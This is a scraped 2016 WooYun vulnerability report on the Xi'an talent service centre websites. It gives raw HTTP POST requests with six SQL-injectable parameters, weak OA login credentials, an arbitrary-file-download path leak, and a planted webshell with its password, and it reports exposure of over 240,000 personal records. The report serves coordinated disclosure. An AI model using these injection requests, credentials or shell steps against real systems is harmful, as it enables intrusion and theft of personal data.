西安市人才服务中心多处SQL注入泄露24w+人才信息和4w+招聘单位信息(网站路径泄露，已shell)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171309

漏洞标题：西安市人才服务中心多处SQL注入泄露24w+人才信息和4w+招聘单位信息(网站路径泄露，已shell)

漏洞作者：胡阿尤

提交时间：2016-01-20 14:02

修复时间：2016-03-07 10:49

公开时间：2016-03-07 10:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-20：细节已通知厂商并且等待厂商处理中
2016-01-22：厂商已经确认，细节仅向厂商公开
2016-02-01：细节向核心白帽子及相关领域专家公开
2016-02-11：细节向普通白帽子公开
2016-02-21：细节向实习白帽子公开
2016-03-07：细节向公众公开

简要描述：

西安市人才服务中心，西安市人才网，西安人才公共服务网，西安毕业生就业网都在一个服务器上。
先是发现了sql注入，折腾了几天一直没能上传webshell，今天准备提交了，还是有点不甘心，又找了下，结果爆出路径了。好吧，妥妥的拿下shell，算是一次完整的练习吧。

详细说明：

起因是这样的，前几天看了一些OA的洞，想找一些OA练练手，结果找到这个网址

**.**.**.**

看不懂是什么OA，不知道怎么下手了，工号是什么鬼，猜不出来啊，不然进去看看的话说不定会有收获。
就这样放弃吗？当然不行，主站看看吧，再找找其他子站，找到了

**.**.**.**

是微信的什么接口吗？还是测试用的？
不太清楚，检测一下吧，于是找到了突破口
总共发现6处注入，分别是：
1.

POST /weixinapp/bdsfz.asp HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://**.**.**.**/weixinapp/bdsfz.asp
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
act=act&name=pxntdmjt&sfz=1&weixin=size%3d%2210%22

这里有两处，name和sfz参数均存在注入。

这个注出来的用户是xahaorczx，应该是当前网站数据库的用户。

POST /service1.asmx/search_pos HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://**.**.**.**/service1.asmx
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
area=555&fbrq=1&pos=1

这里也是两处，area和pos参数均存在注入。

当前用户是sa
3.

POST /service1.asmx/newslist HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
newstype=1

newstype参数存在注入。

还是sa用户
4.

POST /service1.asmx/rcidtf HTTP/1.1
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASPSESSIONIDSSADRQBC=HLFHJMOCLIMFMKADPPDAJMAM
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
rcid=1

rcid参数存在注入

这个点权限好像比较低，注不出来用户了
有24个库，貌似涉及相关的多个网站。

**.**.**.**
**.**.**.**
**.**.**.**
应该都是在这一个服务器上。
包含大量敏感信息

人才信息有24万多条，招聘单位信息有4万多条。

可以--os-shell，不过速度太慢了，受不了

也翻到了OA的账号口令，
108/123456
801/123456
很简单哈，可惜我猜不出啊- -！

登录进去发现还是不认识是什么OA，上传图片的地方不会利用，也不敢乱改配置。
纠结了几天一直没能上传webshell，今天打算放弃了，已经可以--os-shell了，算是拿下服务器了吧。
写报告提交吧，不过还是有点不甘心，就又在相关的几个网站逛了逛，发现这个链接。

http://**.**.**.**/downloads.aspx?path=http://**.**.**.**/DownLoads/6/201412111647362263.doc&name=%e3%80%8a%e8%a5%bf%e5%ae%89%e5%b8%82%e7%81%b5%e6%b4%bb%e5%b0%b1%e4%b8%9a%e4%ba%ba%e5%91%98%e9%80%80%e4%bc%91%e7%94%b3%e8%af%b7%e8%a1%a8%e3%80%8b%ef%bc%88%e8%af%b7%e7%94%a8A4%e7%ba%b8%e6%89%93%e5%8d%b0%ef%bc%89

下载的，改改路径看看能不能任意文件下载呗，结果

爆出路径了，嘿嘿，那就妥妥的写入shell了。
**.**.**.**/woo.aspx 密码：wooyun

好了，就到这里吧，仅作测试，未改配置，未动数据，验证后请删除shell。

漏洞证明：

1433端口外部可以访问哦

数据库用户口令hash

修复方案：

版权声明：转载请注明来源胡阿尤@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-01-22 10:47

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给陕西分中心，由陕西分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171309

漏洞标题：西安市人才服务中心多处SQL注入泄露24w+人才信息和4w+招聘单位信息(网站路径泄露，已shell)

相关厂商：西安市人才服务中心

漏洞作者：胡阿尤

提交时间：2016-01-20 14:02

修复时间：2016-03-07 10:49

公开时间：2016-03-07 10:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源胡阿尤@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171309

漏洞标题：西安市人才服务中心多处SQL注入泄露24w+人才信息和4w+招聘单位信息(网站路径泄露，已shell)

相关厂商：西安市人才服务中心

漏洞作者： 胡阿尤

提交时间：2016-01-20 14:02

修复时间：2016-03-07 10:49

公开时间：2016-03-07 10:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0171309"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 胡阿尤@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：胡阿尤

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源胡阿尤@乌云